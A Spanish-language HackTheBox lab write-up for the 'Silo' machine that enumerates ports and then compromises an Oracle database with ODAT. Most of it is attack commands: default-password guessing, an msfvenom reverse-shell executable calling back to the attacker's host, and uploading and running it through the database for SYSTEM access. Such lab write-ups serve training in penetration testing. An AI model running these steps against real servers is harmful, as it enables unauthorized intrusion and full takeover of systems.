lund@home:~$

Autor: Lund K. S.

HTB_Silo HTB_Silo | Hacker-Blog

HTB_Silo

Silo {-}

Introduccion {-}

La maquina del dia 11/08/2021 se llama Silo .

El replay del live se puede ver aqui

S4vitaar Silo maquina

No olvideis dejar un like al video y un commentario…

Enumeracion {-}

Reconocimiento de maquina, puertos abiertos y servicios {-}

Ping {-}

ping -c 1 10.10.10.82

ttl: 127 -> maquina Windows

Nmap {-}

nmap -p- --open -T5 -v -n 10.10.10.82

Va lento

nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.82 -oG allPorts 
extractPorts allPorts
nmap -sC -sV -p80,135,139,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted
Puerto Servicio Que se nos occure? Que falta?
80 http Web, fuzzing  
135 msrpc    
139 netbios    
445 smb Null session  
1521 oracle-tns Attacke con ODAT  
5985 msrpc Puertos por defecto de windows  
47001 msrpc Puertos por defecto de windows  
49152 msrpc Puertos por defecto de windows  
49153 msrpc Puertos por defecto de windows  
49154 msrpc Puertos por defecto de windows  
49155 msrpc Puertos por defecto de windows  
49159 msrpc Puertos por defecto de windows  
49160 msrpc Puertos por defecto de windows  
49161 msrpc Puertos por defecto de windows  
49162 msrpc Puertos por defecto de windows  

Analyzando el SMB {-}

crackmapexec smb 10.10.10.82
smbclient -L 10.10.10.82 -N

Vemos que estamos en frente de una maquina Windows Server 2021 R2 de 64 bit pro que se llama SILO en el dominio SILO y poco mas

Analyzando la web {-}

Whatweb {-}

whatweb http://10.10.10.82

Nada muy interressante aqui

Checkear la web {-}

Sabemos que es un IIS 8.5 y asp.net pero poco mas. Vamos a fuzzear routas.

Vulnerability Assessment {-}

Oracle ataque con ODAT {-}

Installacion de ODAT {-}

git clone https://github.com/quentinhardy/odat
cd odat
git submodule init
git submodule update
sudo apt-get install libaio1 python3-dev alien python3-pip
pip3 install cx_Oracle

Como la maquina victima es de 64 bits, descargamos los client basic sdk y sqlplus de la web de oracle

mkdir isolation
cd isolation
wget https://download.oracle.com/otn_software/linux/instantclient/211000/oracle-instantclient-basic-21.1.0.0.0-1.x86_64.rpm
wget https://download.oracle.com/otn_software/linux/instantclient/211000/oracle-instantclient-sqlplus-21.1.0.0.0-1.x86_64.rpm
wget https://download.oracle.com/otn_software/linux/instantclient/211000/oracle-instantclient-devel-21.1.0.0.0-1.x86_64.rpm

ahora transformamos los .rpm en .deb y lo installamos

alien --to-deb *.rpm
dpkg -i *.deb

Añadimos las variables de entorno el la .zshrc

ls /usr/lib/oracle

#Output
21

vi ~/.zshrc

export ORACLE_HOME=/usr/lib/oracle/21/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Checkeamos que todo se aya installado bien

sqlplus64
python3 odat.py --help

Ataque con ODAT {-}

  1. Buscamos si encontramos SID’s

     python3 odat.py sidguesser -s 10.10.10.82
    
  2. Ataque de typo password guesser

     locate oracle_ | grep "pass"
     cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | tr ' ' '/' | > passwords
     python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file passwords
    
  3. Ahora que tenemos un usuario y una contraseña utilizamos el parametro utlfile que permite descargar, uploadear y supprimir ficheros

     msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe
     python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger"
     python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger" --putFile /Temp shell.exe
     python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger" --putFile /Temp shell.exe
    
  4. No tenemos sufficientes privilegios para subir archivos pero ODAT tiene un parametro --sysdba que nos puede ayudar

     python3 odat.py utlfile -s 10.10.10.82 -d XE -U "scott" -P "tiger" --putFile /Temp shell.exe --sysdba
    
  5. Intentamos ganar accesso al systema

    Vuln exploit & Gaining Access {-}

Ganando accesso con ODAT {-}

Nos ponemos en escucha por el puerto 443

rlwrap nc -nlvp 443

Intentamos ejecutar el exploit con odat

python3 odat.py --help
python3 odat.py externaltable -s 10.10.10.82 -d XE -U "scott" -P "tiger" --sysdba --exec /Temp shell.exe

Ya hemos ganado accesso al systema y ademas somos nt authority\system que significa que no es necessario hacer escalada de privilegios.